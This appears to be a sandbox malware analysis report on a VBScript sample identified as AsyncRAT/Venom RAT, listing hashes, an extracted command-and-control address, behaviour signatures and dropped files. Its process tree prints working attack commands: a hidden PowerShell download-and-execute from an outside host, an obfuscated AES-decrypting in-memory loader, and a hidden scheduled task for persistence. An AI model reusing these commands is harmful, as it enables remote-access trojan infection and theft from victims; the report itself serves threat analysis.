Overview

overview

10

Static

static

1

051bcd80b8...20.vbs

windows7-x64

8

051bcd80b8...20.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    150s
  • max time network
    156s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    13-12-2024 02:02

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    051bcd80b859378e9ff45546ecc3766499f44190fe25716b7419769b38308320.vbs

  • Size

    91KB

  • MD5

    7f67c01cf304afa0adf4c3095477ab07

  • SHA1

    9c5e5e550e15b4e0e949591488ba72154e13378f

  • SHA256

    051bcd80b859378e9ff45546ecc3766499f44190fe25716b7419769b38308320

  • SHA512

    cbcf82588439f81719c5931b08176de77e3c7d08e22c084836ee3224dbbc6a96ebb4873cb2ac1d6d0225b6f7a8f8cef873fab3b54115e4cd8eb0ec1b623a7737

  • SSDEEP

    1536:M8we4uQyXKFD5cFkWLcaxdYOyhGhRW9w+vcdlziIqzRNBHarEZ+2K:M8z4DOOW4eOFGhRW9wCIzi/8rE42K

Score
10/10
asyncratcore i9 omenexecutionrat

Malware Config

Extracted

Family

asyncrat

Version

Venom RAT + HVNC + Stealer + Grabber v6.0.3

Botnet

core i9 OMEN

C2

45.88.88.7:4164

Mutex

nxafgjygny

Attributes
  • delay

    1

  • install

    false

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

    ratasyncrat
  • Asyncrat family
    asyncrat
  • Async RAT payload 1 IoCs
    rat
  • Blocklisted process makes network request 15 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell and hide display window.

    execution
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 24 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 14 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\051bcd80b859378e9ff45546ecc3766499f44190fe25716b7419769b38308320.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4024
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "iex (iwr -Uri https://emptyservices.xyz/stub.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3240
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\system.bat" "
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:940
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('emte3ttqtxU8Z7uNtvShj79DDsvggmbvOto5AmNpef0='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('UMzwlReo+QuIcZAVBvu6GA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vpydZ=New-Object System.IO.MemoryStream(,$param_var); $whvQX=New-Object System.IO.MemoryStream; $NaCjv=New-Object System.IO.Compression.GZipStream($vpydZ, [IO.Compression.CompressionMode]::Decompress); $NaCjv.CopyTo($whvQX); $NaCjv.Dispose(); $vpydZ.Dispose(); $whvQX.Dispose(); $whvQX.ToArray();}function execute_function($param_var,$param2_var){ $JNCLx=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $MwOUn=$JNCLx.EntryPoint; $MwOUn.Invoke($null, $param2_var);}$toRQS = 'C:\Users\Admin\AppData\Local\Temp\system.bat';$host.UI.RawUI.WindowTitle = $toRQS;$arTVC=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($toRQS).Split([Environment]::NewLine);foreach ($ixRtZ in $arTVC) { if ($ixRtZ.StartsWith(':: ')) { $rZGXb=$ixRtZ.Substring(3); break; }}$payloads_var=[string[]]$rZGXb.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1740
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_730_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_730.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4328
        • C:\Windows\System32\WScript.exe
          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_730.vbs"
          4⤵
          • Checks computer location settings
          • Suspicious use of WriteProcessMemory
          PID:5088
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_730.bat" "
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:548
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('emte3ttqtxU8Z7uNtvShj79DDsvggmbvOto5AmNpef0='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('UMzwlReo+QuIcZAVBvu6GA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vpydZ=New-Object System.IO.MemoryStream(,$param_var); $whvQX=New-Object System.IO.MemoryStream; $NaCjv=New-Object System.IO.Compression.GZipStream($vpydZ, [IO.Compression.CompressionMode]::Decompress); $NaCjv.CopyTo($whvQX); $NaCjv.Dispose(); $vpydZ.Dispose(); $whvQX.Dispose(); $whvQX.ToArray();}function execute_function($param_var,$param2_var){ $JNCLx=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $MwOUn=$JNCLx.EntryPoint; $MwOUn.Invoke($null, $param2_var);}$toRQS = 'C:\Users\Admin\AppData\Roaming\startup_str_730.bat';$host.UI.RawUI.WindowTitle = $toRQS;$arTVC=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($toRQS).Split([Environment]::NewLine);foreach ($ixRtZ in $arTVC) { if ($ixRtZ.StartsWith(':: ')) { $rZGXb=$ixRtZ.Substring(3); break; }}$payloads_var=[string[]]$rZGXb.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
              6⤵
              • Blocklisted process makes network request
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of SetWindowsHookEx
              PID:3736

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
    Filesize

    2KB

    MD5

    2f57fde6b33e89a63cf0dfdd6e60a351

    SHA1

    445bf1b07223a04f8a159581a3d37d630273010f

    SHA256

    3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

    SHA512

    42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    1KB

    MD5

    b66db53846de4860ca72a3e59b38c544

    SHA1

    2202dc88e9cddea92df4f4e8d83930efd98c9c5a

    SHA256

    b1a00fcea37b39a5556eea46e50711f7713b72be077a73cb16515ca3538d6030

    SHA512

    72eff4ae1d541c4438d3cd85d2c1a8c933744b74c7a2a4830ffe398fee88f1a8c5b241d23e94bcdf43b4be28c2747b331a280a7dc67ab67d8e72c6569f016527

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    1KB

    MD5

    7cd8c488a67ed92d9182f555aacaae42

    SHA1

    b8d893cd4287ca44007cc04434e42f7e659fdd0b

    SHA256

    72a35c8ac877e66871380c775dcf10c4cb5903d3fcf891161981f74e749a51f3

    SHA512

    5d71f4937fd0141e0b908d3dc9373a9fe28a74e6488c8cd5f352d8fa3fc0cbcb129ed451221b2c5e41ce8d20f3faaf80471cc9a4bb75195cc00495c81430ba6c

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vel4qpww.yxc.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\system.bat
    Filesize

    82KB

    MD5

    91521a30afc250ec301fbee04e3d72ec

    SHA1

    20c0d5e15643df6215f5052d70ad46d40da15fdd

    SHA256

    87f7bfaaf8f6babc9af3cb2b5de96b6365016121332bd90b8905674acd4940c4

    SHA512

    f9c61a01395eccccbb62ba2ce9cce4678da36b5a67a9712af98965c75cf126a740026bce576fe841b18ba018641842f845c007ad9e62dbde96b5cfd3b5299544

    Download Submit

  • C:\Users\Admin\AppData\Roaming\startup_str_730.vbs
    Filesize

    115B

    MD5

    81cbf15ecd9118329342299f6fc86778

    SHA1

    bd4ea5ac7736bd8cbf7050fd9b79349886b11227

    SHA256

    dea6eb2d69421377af63ffd59d4c507b5a42a6846395b883d149a95b662a3b73

    SHA512

    3f45c3e37447e5fded5eeea5d26c5459025f3446feecaa9bc8c1498efb9a956c87c8fc6fdf9856f7b49504a4e308bb9abe023314b53a06f95b9d2e14ad8afba1

    Download Submit

  • memory/1740-34-0x000001647B500000-0x000001647B512000-memory.dmp

    Filesize

    72KB

    Download

  • memory/1740-33-0x000001647B280000-0x000001647B288000-memory.dmp

    Filesize

    32KB

    Download

  • memory/3240-17-0x00007FFB80F40000-0x00007FFB81A01000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/3240-14-0x00007FFB80F40000-0x00007FFB81A01000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/3240-13-0x00007FFB80F40000-0x00007FFB81A01000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/3240-12-0x00007FFB80F40000-0x00007FFB81A01000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/3240-0-0x00007FFB80F43000-0x00007FFB80F45000-memory.dmp

    Filesize

    8KB

    Download

  • memory/3240-11-0x00007FFB80F40000-0x00007FFB81A01000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/3240-1-0x0000019DE2A50000-0x0000019DE2A72000-memory.dmp

    Filesize

    136KB

    Download

  • memory/3736-63-0x00000215C9C30000-0x00000215C9C48000-memory.dmp

    Filesize

    96KB

    Download